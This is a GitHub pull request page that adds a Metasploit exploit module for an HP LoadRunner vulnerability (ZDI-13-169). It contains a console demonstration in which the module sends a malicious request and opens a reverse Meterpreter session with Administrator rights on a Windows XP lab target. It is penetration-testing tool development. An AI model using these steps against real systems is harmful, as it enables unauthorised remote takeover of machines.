Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for ZDI-13-169 #2459

Merged
merged 3 commits into from Oct 5, 2013
Merged

Conversation

jvazquez-r7
Copy link
Contributor

Tested successfully on HP LoadRunner 11.50 / Windows XP SP3. I have not been able to exploit reliably on other Windows versions due to memory protections. Maybe someone would like to give a chance. Windows XP SP3 is still a supported platform for HP LoadRunner. Maybe still could be possible to exploit on other platforms, but I don't spot how to make it reliable. And don't want the reversing time invested to get the vulnerability so here it is.

Verification

See the demo:

msf > use exploit/windows/misc/hp_loadrunner_magentproc 
rexploitmsf exploit(hp_loadrunner_magentproc) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Sending malicious request...
[*] Sending stage (770048 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1033) at 2013-10-03 22:15:02 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit

@wchen-r7
Copy link
Contributor

wchen-r7 commented Oct 4, 2013

I'll handle this tomorrow. Been working on my dynamic rop payload size branch....

@jvazquez-r7
Copy link
Contributor Author

no rush!

@wchen-r7 wchen-r7 merged commit 646429b into rapid7:master Oct 5, 2013
@jvazquez-r7 jvazquez-r7 deleted the load_runner_research branch November 18, 2014 15:51
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants